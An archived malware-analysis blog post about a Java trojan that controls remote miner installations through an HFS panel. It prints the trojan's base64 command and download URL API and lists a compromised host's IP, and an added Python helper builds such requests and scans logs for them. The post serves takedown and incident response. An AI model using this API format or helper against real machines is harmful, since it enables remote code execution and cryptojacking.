Saturday, January 9, 2016

MMD-0049-2016 - A case of java trojan (downloader/RCE) for remote minerd hack

Background

This is a short post to support a takedown. Warning: sorry, this time there's nothing fancy and no "in-depth analysis" :-) Yet the current hacking and infection scheme is so bad that I think it's best for all of us (fellow sysadmins in particular) to know this information for mitigation and hardening purposes.

In this case, a bad actor was using Java-coded malware planted on a "base infection", a compromised Windows machine (compromised via the usual remote Windows service exploit), to be used for remote command execution (RCE) against other hacked victim machines, or as a multi-OS trojan downloader for attacking further machines. The trojan is meant to be executed under a Java environment on the targeted machines, invoked remotely by URL with arguments acting as an API, to perform code execution or download functions.

In the current finding, this Java trojan is used to install minerd on several targets. The Java trojan's download panel, an HFS (HTTP File Server) web server, was installed on a hacked host in a South Korean network by the suspected bad actor from PRC/China. (Yes, even if it sounds like I'm pointing fingers here, the threat source information is solid; trace the Bitcoin hash (address) or the tools used for PoC.)

Detection of this Java malware is always low, which is why we think raising awareness of the threat is also important, to raise its detection ratio (if possible).

The HFS panel

Our group was informed by our friends (thanks to 김영욱) about the infection panel here:

This panel was spotted in a South Korean friend's (victim's) network. I hope this post can be used as a reference for the good people over there to delete the malware. The oss.war is the Java trojan described above.

In each directory the minerd installer script was also spotted:

..it was written in bash and contains information about the suspected actor.

Trojan downloader & remote command execution

It's Java-coded malware, as seen below:

It takes arguments during the remote access, with a URL format that looks like this:

http://[BASE_INFECTION_PANEL]/oss.war?cmd=[base64]&winurl=[base64]&linurl=[base64]
Each argument is base64-encoded:

These are the download function and the remote execution function as coded:

We believe it's coded in Java to support a multi-OS infection scheme; even though in this case it was set to download a minerd installation bash script, the Java malware itself was designed generically so it can be reused for many infection implementations.

As written above, the detection ratio is low, but I have never seen high detection for any Java-coded applet or .jar since my first day hunting malware on the web-->[link]

Malicious minerd installation

Bitcoin mining is okay, but hacking machines in another country for mining is bad. In this case it is worse than "bad", since the scheme is being used to hack multiple machines for Bitcoin mining.

There are several directories with the extracted Bitcoin miner installer already used remotely to infect victim machine(s), and in each directory there's a one.tar file [link], which is actually a bash script to be executed remotely to install minerd (a *NIX Bitcoin mining program). This remote execution can be done using the Java malware's remote execution function.

Well, I think the comments I wrote in the snippet picture above explain much of the badness and give the link for the next investigation. Ah, yes, it's downloading the x86-64 ELF minerd.


Tips for IR team investigators: if the authorities can access the base-infection machine, they can check the HFS web server log file (which is also held in memory and can be recovered by forensics, in case the bad actor deleted the log) to see which remote victim machines were exploited for this malicious mining.
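To make the oss.war request API above concrete for that log check, here is an added example (my own code, not the trojan's or the panel's) that builds such a request, decodes one, and scans access-log lines for oss.war calls to list which client IPs hit the API and what cmd/winurl/linurl they carried. It assumes standard base64 for the argument values (the post shows they are base64 but not which alphabet, so decoding also tolerates the URL-safe one) and an NCSA-style access-log line for the constructed sample, since the exact HFS log layout is not shown in this post.

```python
"""Encode/decode the oss.war?cmd=&winurl=&linurl= API and pull such calls
out of web-server log lines for IR triage.

Added example, not the trojan's own code. Assumptions: standard base64 for
argument values; NCSA/Apache-style access-log lines for the constructed
sample (the real HFS log layout is not shown on the page)."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

ARGS = ("cmd", "winurl", "linurl")  # argument names from the URL format in the post


def b64enc(text: str) -> str:
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def b64dec(blob: str) -> Optional[str]:
    """Decode one base64 argument. Tolerates the URL-safe alphabet, stripped
    padding, and a '+' that a lenient query parser already turned into ' '."""
    s = blob.strip().replace(" ", "+")
    s += "=" * (-len(s) % 4)
    for candidate in (s, s.replace("-", "+").replace("_", "/")):
        try:
            return base64.b64decode(candidate, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
    return None  # not base64 at all: worth a look, but not decodable


def build_request(panel: str, cmd: str, winurl: str, linurl: str) -> str:
    """Build a request URL in the shape the post describes (lab/replay use only)."""
    query = urlencode({"cmd": b64enc(cmd), "winurl": b64enc(winurl), "linurl": b64enc(linurl)})
    return f"http://{panel}/oss.war?{query}"


def decode_request(url: str) -> Dict[str, Optional[str]]:
    """Return the decoded cmd/winurl/linurl arguments of one request URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: b64dec(qs[k][0]) for k in ARGS if k in qs}


REQ_RE = re.compile(r'"(?:GET|POST) (?P<path>/oss\.war\?[^ "]*) HTTP/')


def scan_log(lines: List[str]) -> List[Tuple[str, Dict[str, Optional[str]]]]:
    """Find oss.war API calls in access-log lines; yields (client_ip, decoded args).
    The client IP column is the remote machine that called the panel."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        client_ip = line.split(" ", 1)[0]
        hits.append((client_ip, decode_request("http://panel" + m.group("path"))))
    return hits


# --- Constructed sample data (illustrative values, not taken from the real panel) ---
SAMPLE_CMD = "uname -a"
SAMPLE_WINURL = "http://panel/win.bin"
SAMPLE_LINURL = "http://panel/one.tar"


def _sample_line(client_ip: str, url: str) -> str:
    parts = urlsplit(url)
    return (f'{client_ip} - - [09/Jan/2016:10:11:12 +0900] '
            f'"GET {parts.path}?{parts.query} HTTP/1.1" 200 4096')


SAMPLE_LOG = [
    _sample_line("192.0.2.10", build_request("panel", SAMPLE_CMD, SAMPLE_WINURL, SAMPLE_LINURL)),
    '192.0.2.11 - - [09/Jan/2016:10:12:30 +0900] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, args in scan_log(SAMPLE_LOG):
        print(ip, args)
```

Run against the recovered HFS log (or a memory dump of it) the same way: every client IP returned by scan_log is a machine that called the API, and the decoded linurl/winurl values point at the payloads it was told to fetch.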

Epilogue & follow-up

Thanks to everyone involved in this matter. Please bear with this simple short post.
Using Java for this purpose is not nice, and it's good to know about.
I posted the sample in kernelmode [link].
Thanks in advance to the S. Korean friends for the cleanup; below is more info on the network:

{
  "ip": "202.68.226.59",
  "region": "Seoul",
  "country": "KR",
  "loc": "37.5985,126.9783",
  "org": "AS38086 IP4 Networks,Inc.(cwsys.net)",
  "prefix": "202.68.224.0/20"
}

#MalwareMustDie!